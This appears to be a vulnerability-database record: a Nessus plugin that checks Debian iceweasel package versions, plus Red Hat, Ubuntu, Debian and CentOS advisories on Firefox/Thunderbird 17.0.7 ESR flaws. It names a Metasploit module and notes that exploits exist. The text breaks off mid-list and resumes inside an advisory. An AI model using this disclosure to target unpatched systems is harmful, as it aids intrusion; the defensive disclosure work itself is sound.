implementation errors may lead to\nthe execution of arbitrary code, privilege escalation, information\ndisclosure or cross-site request forgery.\n\nThe Iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/iceweasel\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2716\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the iceweasel packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 17.0.7esr-1~deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are 
available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:iceweasel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dbg\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-dev\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ach\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", 
prefix:\"iceweasel-l10n-af\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-all\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-an\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ar\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-as\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ast\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-be\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bg\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-bd\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bn-in\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-br\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-bs\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ca\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cs\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-csb\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-cy\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-da\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-de\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-el\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif 
(deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-gb\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-en-za\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eo\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-ar\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-cl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-es\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-es-mx\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-et\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-eu\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fa\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ff\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fi\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fr\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-fy-nl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-ga-ie\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gd\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gl\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-gu-in\", reference:\"17.0.7esr-1~deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"iceweasel-l10n-he\", 
(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 17.0.7 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\n", "modified": "2018-06-06T20:24:36", "published": "2013-06-25T04:00:00", "id": "RHSA-2013:0981", "href": "https://access.redhat.com/errata/RHSA-2013:0981", "type": "redhat", "title": "(RHSA-2013:0981) Critical: firefox security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "Multiple memory safety issues were discovered in Thunderbird. If the user \nwere tricked into opening a specially crafted message with scripting \nenabled, an attacker could possibly exploit these to cause a denial of \nservice via application crash, or potentially execute arbitrary code with \nthe privileges of the user invoking Thunderbird. (CVE-2013-1682)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user were \ntricked into opening a specially crafted message with scripting enabled, \nan attacker could possibly exploit these to execute arbitrary code with \nthe privileges of the user invoking Thunderbird. 
(CVE-2013-1684, \nCVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope of \nan element could be made to bypass System Only Wrappers (SOW). If a user \nhad scripting enabled, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking \nThunderbird. (CVE-2013-1687)\n\nA crash was discovered when reloading a page that contained content using \nthe onreadystatechange event. If a user had scripting enabled, an attacker \ncould potentially exploit this to execute arbitrary code with the \nprivileges of the user invoking Thunderbird. (CVE-2013-1690)\n\nJohnathan Kuskos discovered that Thunderbird sent data in the body of \nXMLHttpRequest HEAD requests. If a user had scripting enabled, an attacker \ncould exploit this to conduct Cross-Site Request Forgery (CSRF) attacks. \n(CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images with \nfilters. If a user had scripting enabled, an attacker could exploit this \nto view sensitive information. (CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. If a user had \nscripting enabled, an attacker could potentially exploit this to cause \na denial of service via application crash, or execute code with the \nprivileges of the user invoking Thunderbird. (CVE-2013-1694)\n\nIt was discovered that XrayWrappers could be bypassed to call \ncontent-defined methods in certain circumstances. If a user had scripting \nenabled, an attacker could exploit this to cause undefined behaviour. 
\n(CVE-2013-1697)", "edition": 5, "modified": "2013-06-26T00:00:00", "published": "2013-06-26T00:00:00", "id": "USN-1891-1", "href": "https://ubuntu.com/security/notices/USN-1891-1", "title": "Thunderbird vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:43", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1699", "CVE-2013-1693"], "description": "USN-1890-1 fixed vulnerabilities in Firefox. This update introduced a \nregression which sometimes resulted in Firefox using the wrong network \nproxy settings. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMultiple memory safety issues were discovered in Firefox. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to cause a denial of service via application crash, or \npotentially execute arbitrary code with the privileges of the user invoking \nFirefox. (CVE-2013-1682, CVE-2013-1683)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to execute arbitrary code with the privileges of the user \ninvoking Firefox. (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope of \nan element could be made to bypass System Only Wrappers (SOW). An attacker \ncould potentially exploit this to execute arbitrary code with the \nprivileges of the user invoking Firefox. (CVE-2013-1687)\n\nMariusz Mlynski discovered that the profiler user interface incorrectly \nhandled data from the profiler. 
If the user examined profiler output \non a specially crafted page, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking Firefox. \n(CVE-2013-1688)\n\nA crash was discovered when reloading a page that contained content using \nthe onreadystatechange event. An attacker could potentially exploit this \nto execute arbitrary code with the privileges of the user invoking Firefox \n(CVE-2013-1690)\n\nJohnathan Kuskos discovered that Firefox sent data in the body of \nXMLHttpRequest HEAD requests. An attacker could exploit this to conduct \nCross-Site Request Forgery (CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images with \nfilters. An attacker could exploit this to view sensitive information. \n(CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. An attacker could \npotentially exploit this to cause a denial of service via application \ncrash, or execute code with the privileges of the user invoking Firefox. \n(CVE-2013-1694)\n\nBob Owen discovered that a sandboxed iframe could use a frame element \nto bypass its own restrictions. (CVE-2013-1695)\n\nFr\u00e9d\u00e9ric Buclin discovered that the X-Frame-Options header is ignored \nin multi-part responses. An attacker could potentially exploit this \nto conduct clickjacking attacks. (CVE-2013-1696)\n\nIt was discovered that XrayWrappers could be bypassed to call \ncontent-defined methods in certain circumstances. An attacker could \nexploit this to cause undefined behaviour. (CVE-2013-1697)\n\nMatt Wobensmith discovered that the getUserMedia permission dialog \ndisplayed the wrong domain in certain circumstances. An attacker could \npotentially exploit this to trick the user in to giving a malicious \nsite access to their microphone or camera. 
(CVE-2013-1698)\n\nIt was discovered that the measures for preventing homograph attacks \nusing Internationalized Domain Names (IDN) were not sufficient \nfor certain Top Level Domains (TLD). An attacker could potentially \nexploit this to conduct URL spoofing and phishing attacks. \n(CVE-2013-1699)", "edition": 5, "modified": "2013-07-03T00:00:00", "published": "2013-07-03T00:00:00", "id": "USN-1890-2", "href": "https://ubuntu.com/security/notices/USN-1890-2", "title": "Firefox regression", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:33:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1696", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1695", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1688", "CVE-2013-1686", "CVE-2013-1698", "CVE-2013-1682", "CVE-2013-1683", "CVE-2013-1699", "CVE-2013-1693"], "description": "Multiple memory safety issues were discovered in Firefox. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to cause a denial of service via application crash, or \npotentially execute arbitrary code with the privileges of the user invoking \nFirefox. (CVE-2013-1682, CVE-2013-1683)\n\nAbhishek Arya discovered multiple use-after-free bugs. If the user were \ntricked into opening a specially crafted page, an attacker could possibly \nexploit these to execute arbitrary code with the privileges of the user \ninvoking Firefox. (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\nMariusz Mlynski discovered that user defined code within the XBL scope of \nan element could be made to bypass System Only Wrappers (SOW). An attacker \ncould potentially exploit this to execute arbitrary code with the \nprivileges of the user invoking Firefox. (CVE-2013-1687)\n\nMariusz Mlynski discovered that the profiler user interface incorrectly \nhandled data from the profiler. 
If the user examined profiler output \non a specially crafted page, an attacker could potentially exploit this to \nexecute arbitrary code with the privileges of the user invoking Firefox. \n(CVE-2013-1688)\n\nA crash was discovered when reloading a page that contained content using \nthe onreadystatechange event. An attacker could potentially exploit this \nto execute arbitrary code with the privileges of the user invoking Firefox \n(CVE-2013-1690)\n\nJohnathan Kuskos discovered that Firefox sent data in the body of \nXMLHttpRequest HEAD requests. An attacker could exploit this to conduct \nCross-Site Request Forgery (CSRF) attacks. (CVE-2013-1692)\n\nPaul Stone discovered a timing flaw in the processing of SVG images with \nfilters. An attacker could exploit this to view sensitive information. \n(CVE-2013-1693)\n\nBoris Zbarsky discovered a flaw in PreserveWrapper. An attacker could \npotentially exploit this to cause a denial of service via application \ncrash, or execute code with the privileges of the user invoking Firefox. \n(CVE-2013-1694)\n\nBob Owen discovered that a sandboxed iframe could use a frame element \nto bypass its own restrictions. (CVE-2013-1695)\n\nFr\u00e9d\u00e9ric Buclin discovered that the X-Frame-Options header is ignored \nin multi-part responses. An attacker could potentially exploit this \nto conduct clickjacking attacks. (CVE-2013-1696)\n\nIt was discovered that XrayWrappers could be bypassed to call \ncontent-defined methods in certain circumstances. An attacker could \nexploit this to cause undefined behaviour. (CVE-2013-1697)\n\nMatt Wobensmith discovered that the getUserMedia permission dialog \ndisplayed the wrong domain in certain circumstances. An attacker could \npotentially exploit this to trick the user in to giving a malicious \nsite access to their microphone or camera. 
(CVE-2013-1698)\n\nIt was discovered that the measures for preventing homograph attacks \nusing Internationalized Domain Names (IDN) were not sufficient \nfor certain Top Level Domains (TLD). An attacker could potentially \nexploit this to conduct URL spoofing and phishing attacks. \n(CVE-2013-1699)", "edition": 5, "modified": "2013-06-26T00:00:00", "published": "2013-06-26T00:00:00", "id": "USN-1890-1", "href": "https://ubuntu.com/security/notices/USN-1890-1", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:57", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2720-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 06, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : icedove\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1682 CVE-2013-1684 CVE-2013-1685 CVE-2013-1686 \n CVE-2013-1687 CVE-2013-1690 CVE-2013-1692 CVE-2013-1693 \n CVE-2013-1694 CVE-2013-1697\n\nMultiple security issues have been found in Icedove, Debian's version\nof the Mozilla Thunderbird mail and news client. 
Multiple memory safety \nerrors, use-after-free vulnerabilities, missing permission checks, incorrect \nmemory handling and other implementaton errors may lead to the execution\nof arbitrary code, privilege escalation, information disclosure or\ncross-site request forgery.\n\nAs already announced for Iceweasel: We're changing the approach for\nsecurity updates for Icedove in stable-security: Instead of\nbackporting security fixes, we now provide releases based on the \nExtended Support Release branch. As such, this update introduces\npackages based on Thunderbird 17 and at some point in the future we \nwill switch to the next ESR branch once ESR 17 has reached it's end \nof life.\n\nSome Icedove extensions currently packaged in the Debian archive are \nnot compatible with the new browser engine. Up-to-date and compatible \nversions can be retrieved from http://addons.mozilla.org as a short \nterm solution.\n\nAn updated and compatible version of enigmail is included with this \nupdate.\n\nThe icedove version in the oldstable distribution (squeeze) is no\nlonger supported with full security updates. However, it should be\nnoted that almost all security issues in Icedove stem from the\nincluded browser engine. These security problems only affect Icedove\nif scripting and HTML mails are enabled. If there are security issues\nspecific to Icedove (e.g. 
a hypothetical buffer overflow in the IMAP\nimplementation) we'll make an effort to backport such fixes to oldstable.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 17.0.7-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 17.0.7-1.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 2, "modified": "2013-07-06T15:37:40", "published": "2013-07-06T15:37:40", "id": "DEBIAN:DSA-2720-1:1CEA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00129.html", "title": "[SECURITY] [DSA 2720-1] icedove security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2716-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 26, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : iceweasel\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1682 CVE-2013-1684 CVE-2013-1685 CVE-2013-1686 \n CVE-2013-1687 CVE-2013-1690 CVE-2013-1692 CVE-2013-1693 \n CVE-2013-1694 CVE-2013-1697\n\nMultiple security issues have been found in Iceweasel, Debian's version\nof the Mozilla Firefox web browser: Multiple memory safety errors,\nuse-after-free vulnerabilities, missing permission 
checks, incorrect \nmemory handling and other implementaton errors may lead to the execution\nof arbitrary code, privilege escalation, information disclosure or\ncross-site request forgery.\n\nThe iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 17.0.7esr-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 17.0.7esr-1.\n\nWe recommend that you upgrade your iceweasel packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n\n", "edition": 3, "modified": "2013-06-26T14:01:13", "published": "2013-06-26T14:01:13", "id": "DEBIAN:DSA-2716-1:03728", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00125.html", "title": "[SECURITY] [DSA 2716-1] iceweasel security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-07-17T03:33:02", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0982\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content. Malicious\ncontent could cause Thunderbird to crash or, potentially, execute arbitrary\ncode with the privileges of the user running Thunderbird. (CVE-2013-1682,\nCVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. 
In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these flaws to\nbypass some restrictions placed on them. This could lead to unexpected\nbehavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nNote: All of the above issues cannot be exploited by a specially-crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues. 
After\ninstalling the update, Thunderbird must be restarted for the changes to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031845.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031855.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2013-0982.html", "edition": 5, "modified": "2013-06-26T02:38:03", "published": "2013-06-26T02:19:42", "href": "http://lists.centos.org/pipermail/centos-announce/2013-June/031845.html", "id": "CESA-2013:0982", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0981\n\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\nCVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its internal\nstructures (called wrappers). 
An attacker could use these flaws to bypass\nsome restrictions placed on them. This could lead to unexpected behavior or\na potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 17.0.7 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031846.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031847.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031854.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031856.html\n\n**Affected packages:**\nfirefox\nxulrunner\nxulrunner-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0981.html", "edition": 3, "modified": "2013-06-26T02:40:20", "published": "2013-06-26T02:19:59", "href": "http://lists.centos.org/pipermail/centos-announce/2013-June/031846.html", "id": "CESA-2013:0981", "title": "firefox, xulrunner security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}